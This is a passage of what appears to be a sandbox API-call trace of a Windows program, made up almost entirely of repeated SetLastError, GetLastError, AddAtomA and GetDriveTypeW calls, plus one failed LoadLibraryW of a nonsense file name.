(dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.372] SetLastError (dwErrCode=0x0) [0099.372] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.385] GetLastError () returned 0x0 [0099.385] SetLastError (dwErrCode=0x0) [0099.385] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0099.385] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0099.385] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 